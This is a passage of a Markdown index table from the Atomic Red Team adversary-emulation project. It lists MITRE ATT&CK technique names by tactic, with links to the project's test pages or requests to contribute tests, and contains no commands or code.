| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [Group Policy Discovery](../../T1615/T1615.md) | [Replication Through Removable Media](../../T1091/T1091.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Replication Through Removable Media](../../T1091/T1091.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Supply Chain Compromise](../../T1195/T1195.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Native API](../../T1106/T1106.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Direct Volume Access](../../T1006/T1006.md) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | [Remote Access Software](../../T1219/T1219.md) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [System Information Discovery](../../T1082/T1082.md) | [Software Deployment Tools](../../T1072/T1072.md) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [Application Window Discovery](../../T1010/T1010.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Video Capture](../../T1125/T1125.md) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Inter-Process Communication](../../T1559/T1559.md) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Process Injection](../../T1055/T1055.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hide Artifacts](../../T1564/T1564.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Process Discovery](../../T1057/T1057.md) | | [Data from Network Shared Drive](../../T1039/T1039.md) | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
| | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [Password Policy Discovery](../../T1201/T1201.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
| | Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Query Registry](../../T1012/T1012.md) | | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | [Non-Standard Port](../../T1571/T1571.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | [Encrypted Channel](../../T1573/T1573.md) | |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
